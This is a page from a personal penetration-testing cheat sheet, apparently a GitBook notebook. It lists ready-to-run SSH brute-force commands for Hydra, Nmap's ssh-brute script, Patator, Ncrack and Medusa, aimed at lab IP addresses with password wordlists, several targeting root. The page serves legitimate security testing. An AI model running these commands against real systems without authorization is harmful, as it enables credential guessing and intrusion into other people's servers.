My Pentesting Space
LinkedIn
  • Welcome to Hackjiji
  • 🕸️web pentesting
    • Basics
    • Web pentest cheatsheet
    • Burpsuite and browser tricks
    • cUrl cheatsheet
    • CVE exploitation
    • JavaScript Obfuscation/Deobfuscation
  • Network pentesting
    • Basics
    • Nmap favorites
    • Host discovery
    • Port scanning
    • Network Services
      • RPC-NFC
      • WINRM - 5895-5896
      • FTP - 21
      • SMB - 445
      • RDP - 3389
      • SSH - 22
      • SMTP - 25
    • Firewall evasion
    • Pivoting and double pivoting
  • Physical pentesting
    • Bad USB - Rubber Duckies
  • Linux pentesting
    • Usefull command's
    • Privilege escalation
  • windows pentesting
    • Windows useful commands
    • Windows Reverse shell codes
    • Privilege escalation
  • Active Directory pentesting
    • Basics
    • AD
    • AAD
  • General
    • Hash cracking
    • Wordlist
    • Encoding/decoding
    • Environment setup
      • Install a new OS on seperated boot sector
      • Hyper-V
      • Virtualbox
    • Reverse-shell-cheatsheet
    • Metasploit cheatsheet
    • Vulnerability research
    • My scanning methodology
  • Events
    • HackTheBox Meetup - LFI2RCE
    • Radio Equans - QR Code Awareness campaign
    • Cybersecurity job campaign
Powered by GitBook
On this page
  • SSH Bruteforcing
  • SMTP
  1. Network pentesting
  2. Network Services

SSH - 22

SSH Bruteforcing

  • Hydra Command: Use Hydra for SSH brute forcing with username and password lists.

    hydra -L /home/pentester/Wordlists/Usernames.txt -P /home/pentester/Wordlists/Passwords.txt 172.19.19.70 ssh
  • Nmap Command: Nmap script for SSH brute force using username and password databases.

    nmap -p22 172.25.30.4 --script ssh-brute.nse --script-args userdb=/home/kali/wordlistcpent/usernames,passdb=/home/kali/wordlistcpent/passwords --script-args ssh-brute.timeout=4s
  • Patator Command: Utilize Patator for flexible SSH brute force with password file.

    patator ssh_login host=172.25.120.125 user=root password=FILE0 0=/home/kali/Downloads/Passwords.txt
  • Ncrack Command: Employ Ncrack for SSH brute force on a specific port with password list.

    ncrack -v --user root -P /usr/share/wordlists/rockyou.txt ssh://172.25.120.240:60000
  • Medusa Command: Medusa brute forcing against SSH using password file.

    Medusa -h 192.168.0.1 -u root -P /home/password.txt -M ssh
    

SMTP

PreviousRDP - 3389NextSMTP - 25

Last updated 6 months ago